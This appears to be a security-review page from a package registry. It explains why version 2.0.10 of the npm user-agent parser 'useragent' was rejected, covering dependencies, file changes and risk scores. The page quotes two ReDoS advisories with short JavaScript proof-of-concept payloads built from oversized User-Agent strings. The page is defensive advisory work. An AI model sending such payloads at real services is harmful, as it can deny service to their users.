All useragent versions

useragent @2.0.10

rejected
This version was rejected. It did not pass GreenFlagged's security review and is not served by the registry. The findings and risk dispositions below explain why.
Risk Score: 68
License: MIT
Install Scripts: Yes
Dependencies: 1
Dev Dependencies: 7
Package Size: 148.1 KB
Published

Fastest, most accurate & efficient user agent string parser, uses Browserscope's research for parsing

Maintainers

V1

Keywords

agent, browser, browserscope, os, parse, parser, ua, ua-parse, ua-parser, user agent, user, user-agent, useragent, version

Dependencies (1)

Package      Constraint   Registry Status
lru-cache    2.2.x        auto_approved

Dev Dependencies (7)

Package             Constraint   Registry Status
mocha               *            auto_approved
semver              1.0.x        auto_approved
should              *            auto_approved
request             2.9.x        No greenflagged match
pre-commit          0.0.x        No greenflagged match
yamlparser          0.0.x        auto_approved
long-stack-traces   0.1.x        auto_approved

Transitive Dependency Tree

1 transitive dep, max depth 1
  ├─ lru-cache 2.2.x → 2.2.4

Changes from v0.1.2

Dependency Changes

Change   Package     Version
added    lru-cache   2.2.x

Script Changes

+ qa
+ test
+ update

License Changed

none → none

File Changes

20 added, 7 removed, 2 modified; size delta: +1238.1 KB

Risk Dispositions (1 applicable to this version, 0 other)

Accepted rules are downgraded to INFO on future analyses; rejected rules escalate to CRITICAL.

Rule: osv:GHSA-mgfv-m47x-4wqp
Source: osv
Disposition: reject
Author: AI
Reason: AI (osv): ReDoS vulnerability (CVSS 7.5) affects all versions <= 2.3.0 with no fix published. Verdict generalizes to all versions in the affected range.

SAST Findings (3)

CRITICAL GHSA-mgfv-m47x-4wqp: useragent Regular Expression Denial of Service vulnerability osv

[Always reject] CVSS 7.5 (HIGH) — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Useragent is a user agent parser for Node.js. All versions as of time of publication contain one or more regular expressions that are vulnerable to Regular Expression Denial of Service (ReDoS).

## PoC

```js
async function exploit() {
  const useragent = require("useragent");
  // Create a malicious user-agent that leads to excessive backtracking
  const maliciousUserAgent = 'Mozilla/5.0 (' + 'X'.repeat(30000) + ') Gecko/20100101 Firefox/77.0';
  // Parse the malicious user-agent
  const agent = useragent.parse(maliciousUserAgent);
  // Call the toString method to trigger the vulnerability
  const result = await agent.device.toString();
  console.log(result);
}
await exploit();
```

HIGH GHSA-pjmx-9xr3-82qr: ReDoS via long UserAgent header in useragent osv

Affected versions of `useragent` are vulnerable to regular expression denial of service when an arbitrarily long `User-Agent` header is parsed.

## Proof of Concept

```js
var useragent = require('useragent');
var badUserAgent = 'MSIE 0.0' + Array(900000).join('0') + 'XBLWP';
var request = 'GET / HTTP/1.1\r\nUser-Agent: ' + badUserAgent + '\r\n\r\n';
console.log(useragent.parse(request));
```

## Recommendation

Update to version 2.1.13 or later.

LOW No provenance attestation provenance

Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.

Review Summary

Risk score: 68. Findings: 1 critical (+40), 1 high (+25), 1 low (+3).

Commit: 80ea9b7bbf85

Published to npm: